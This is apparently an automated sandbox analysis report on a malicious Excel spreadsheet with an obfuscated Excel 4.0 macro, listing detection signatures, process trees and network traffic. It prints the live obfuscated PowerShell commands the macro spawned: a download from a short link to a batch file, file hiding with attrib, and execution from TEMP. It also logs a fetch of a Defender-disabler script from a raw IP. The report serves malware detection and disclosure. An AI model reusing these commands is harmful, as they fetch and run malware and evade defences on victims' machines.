Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Payment Documents.xls

Overview

General Information

Sample Name:Payment Documents.xls
Analysis ID:336485
MD5:3acbe5e1d7a0dceb1125d987988765ea
SHA1:7fafd588ff8b2e8fda79eab3a9460fa3c01bd6d8
SHA256:e331f9c19372cfd42c85f2bbf26f58e9800c2f14504aed43825c7da3ef913d7a
Tags:SilentBuilderxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Obfuscated command line found
Sigma detected: Microsoft Office Product Spawning Windows Shell
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 7136 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • cmd.exe (PID: 3984 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5980 cmdline: powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • cmd.exe (PID: 1368 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 4344 cmdline: powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • cmd.exe (PID: 6084 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 4832 cmdline: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • attrib.exe (PID: 1020 cmdline: 'C:\Windows\system32\attrib.exe' +s +h pd.bat MD5: A5540E9F87D4CB083BDF8269DEC1CFF9)
    • cmd.exe (PID: 6360 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 2804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6376 cmdline: powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • cmd.exe (PID: 584 cmdline: cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/3js2g8s','pd.bat') MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6496 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/3js2g8s','pd.bat') MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Payment Documents.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x6bc2:$s1: Excel
  • 0x337f:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 7136, ProcessCommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', ProcessId: 3984
Sigma detected: Hiding Files with Attrib.exeShow sources
Source: Process startedAuthor: Sami Ruohonen: Data: Command: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\attrib.exe, NewProcessName: C:\Windows\SysWOW64\attrib.exe, OriginalFileName: C:\Windows\SysWOW64\attrib.exe, ParentCommandLine: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4832, ProcessCommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, ProcessId: 1020

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: Payment Documents.xlsReversingLabs: Detection: 13%

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: global trafficDNS query: name: cutt.ly
Source: global trafficTCP traffic: 192.168.2.4:49765 -> 104.22.0.232:443
Source: global trafficTCP traffic: 192.168.2.4:49765 -> 104.22.0.232:443
Source: global trafficHTTP traffic detected: GET /bat/scriptxls_cf6c45a3-4840-422a-8668-e9a12252c924_thecabal1_wddisabler.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 104.22.0.232 104.22.0.232
Source: Joe Sandbox ViewIP Address: 37.46.150.139 37.46.150.139
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
Source: global trafficHTTP traffic detected: GET /bat/scriptxls_cf6c45a3-4840-422a-8668-e9a12252c924_thecabal1_wddisabler.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
Source: unknownDNS traffic detected: queries for: cutt.ly
Source: powershell.exe, 0000000F.00000002.958975696.0000000004C45000.00000004.00000001.sdmpString found in binary or memory: http://37.46.150.139
Source: powershell.exe, 0000000F.00000002.958743859.0000000004C24000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.958975696.0000000004C45000.00000004.00000001.sdmpString found in binary or memory: http://37.46.150.139/bat/scriptxls_cf6c45a3-4840-422a-8668-e9a12252c924_thecabal1_wddisabler.bat
Source: powershell.exe, 0000000F.00000002.958975696.0000000004C45000.00000004.00000001.sdmpString found in binary or memory: http://37.46.150.1394Me
Source: powershell.exe, 0000000F.00000002.958743859.0000000004C24000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0
Source: powershell.exe, 0000000F.00000002.958743859.0000000004C24000.00000004.00000001.sdmpString found in binary or memory: http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0L
Source: powershell.exe, 00000006.00000002.962823127.00000000082B0000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.952223174.0000000002746000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000003.912180483.0000000008379000.00000004.00000001.sdmpString found in binary or memory: http://crl.h
Source: powershell.exe, 0000000F.00000002.958743859.0000000004C24000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0c
Source: powershell.exe, 0000000F.00000002.958743859.0000000004C24000.00000004.00000001.sdmpString found in binary or memory: http://cutt.ly
Source: powershell.exe, 00000006.00000002.953342990.00000000062A6000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.972171242.00000000057E9000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.957524722.0000000006167000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.970974266.0000000005699000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000F.00000002.958743859.0000000004C24000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0B
Source: powershell.exe, 00000009.00000002.963794619.00000000048C2000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000003.919929035.000000000812B000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.940720063.0000000005242000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.974235994.00000000072BC000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.955055191.0000000004911000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000F.00000002.955055191.0000000004911000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png(
Source: powershell.exe, 0000000E.00000002.961261599.0000000004771000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngl
Source: powershell.exe, 00000006.00000002.936758656.0000000005241000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.962445153.0000000004781000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.938034330.0000000005101000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.959408450.0000000004631000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.958743859.0000000004C24000.00000004.00000001.sdmpString found in binary or memory: http://status.rapidssl.com0
Source: powershell.exe, 00000009.00000002.963794619.00000000048C2000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000003.919929035.000000000812B000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.940720063.0000000005242000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.974235994.00000000072BC000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.955055191.0000000004911000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000F.00000002.955055191.0000000004911000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html(
Source: powershell.exe, 0000000E.00000002.961261599.0000000004771000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmll
Source: powershell.exe, 0000000E.00000002.970974266.0000000005699000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.970974266.0000000005699000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.970974266.0000000005699000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000F.00000002.955055191.0000000004911000.00000004.00000001.sdmpString found in binary or memory: https://cutt.ly/3js2g8s
Source: powershell.exe, 00000009.00000002.963794619.00000000048C2000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000003.919929035.000000000812B000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.940720063.0000000005242000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.974235994.00000000072BC000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.955055191.0000000004911000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.955055191.0000000004911000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester(
Source: powershell.exe, 0000000E.00000002.961261599.0000000004771000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pesterl
Source: powershell.exe, 00000009.00000003.906986819.00000000051C2000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000003.905471966.0000000005B30000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000003.899219620.0000000005061000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000006.00000002.953342990.00000000062A6000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.972171242.00000000057E9000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.957524722.0000000006167000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.970974266.0000000005699000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000F.00000002.958743859.0000000004C24000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.958975696.0000000004C45000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: powershell.exe, 0000000F.00000002.958743859.0000000004C24000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: powershell.exe, 0000000F.00000002.958743859.0000000004C24000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-112763434-1
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443

System Summary:

barindex
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Payment Documents.xlsInitial sample: EXEC
Found obfuscated Excel 4.0 MacroShow sources
Source: Payment Documents.xlsInitial sample: High usage of CHAR() function: 21
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_034100406_2_03410040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0341AC206_2_0341AC20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_034159486_2_03415948
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0341C8586_2_0341C858
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0341E8D06_2_0341E8D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_034663536_2_03466353
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_034600406_2_03460040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_034663536_2_03466353
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_034618A86_2_034618A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0346BC186_2_0346BC18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0346BC186_2_0346BC18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0346BC186_2_0346BC18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_023A982F9_2_023A982F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_027AB1919_2_027AB191
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_027A67889_2_027A6788
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_027AC4F09_2_027AC4F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_027ADB609_2_027ADB60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_027A81F09_2_027A81F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_027AC1989_2_027AC198
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_027A86609_2_027A8660
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_027A677A9_2_027A677A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_027ADB609_2_027ADB60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_027B37289_2_027B3728
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_027B2A609_2_027B2A60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_027B8A889_2_027B8A88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_027BB8989_2_027BB898
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_027B92389_2_027B9238
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_027B85409_2_027B8540
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_027BB8989_2_027BB898
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_027BB8989_2_027BB898
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_029FACF89_2_029FACF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_029F6AB09_2_029F6AB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_029F6AA09_2_029F6AA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_029FAD839_2_029FAD83
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_029FADC09_2_029FADC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_033AB8F812_2_033AB8F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_033A3EE812_2_033A3EE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_033B4B0012_2_033B4B00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_033BB95012_2_033BB950
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_033BB95012_2_033BB950
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_033BB95012_2_033BB950
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_033B4B0012_2_033B4B00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_033B004012_2_033B0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_033B8F3012_2_033B8F30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_078C6F5012_2_078C6F50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_078C6F4012_2_078C6F40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_078C90D212_2_078C90D2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_078C90E012_2_078C90E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_050E71B012_2_050E71B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_050E71C012_2_050E71C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_050EAF6112_2_050EAF61
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_050EAF7012_2_050EAF70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_06C5DFE814_2_06C5DFE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_06C5F1C114_2_06C5F1C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_06C561A014_2_06C561A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_06C5D9AA14_2_06C5D9AA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_06C54CC014_2_06C54CC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_06C565B014_2_06C565B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_06C57BED14_2_06C57BED
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0743924014_2_07439240
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07435FC814_2_07435FC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0743E26814_2_0743E268
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0743E27814_2_0743E278
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0743923014_2_07439230
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07435FB814_2_07435FB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0796D5B014_2_0796D5B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07961B8014_2_07961B80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07961B3014_2_07961B30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07B7004014_2_07B70040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07B74F1014_2_07B74F10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07B7EE1814_2_07B7EE18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07B75EF014_2_07B75EF0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_07B75EE014_2_07B75EE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_028F407015_2_028F4070
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_028FC60F15_2_028FC60F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_028F05F015_2_028F05F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0291F9E815_2_0291F9E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0291168015_2_02911680
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0291D17815_2_0291D178
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0291F9E815_2_0291F9E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0291F4A815_2_0291F4A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0427CB2215_2_0427CB22
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_0427CB3015_2_0427CB30
Source: Payment Documents.xlsOLE indicator, VBA macros: true
Source: Payment Documents.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: classification engineClassification label: mal68.expl.evad.winXLS@31/32@1/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1380:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5008:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2804:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5704:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{15F53E46-9313-4F33-865A-39322DB68C18} - OProcSessId.datJump to behavior
Source: Payment Documents.xlsOLE indicator, Workbook stream: true
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Payment Documents.xlsReversingLabs: Detection: 13%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
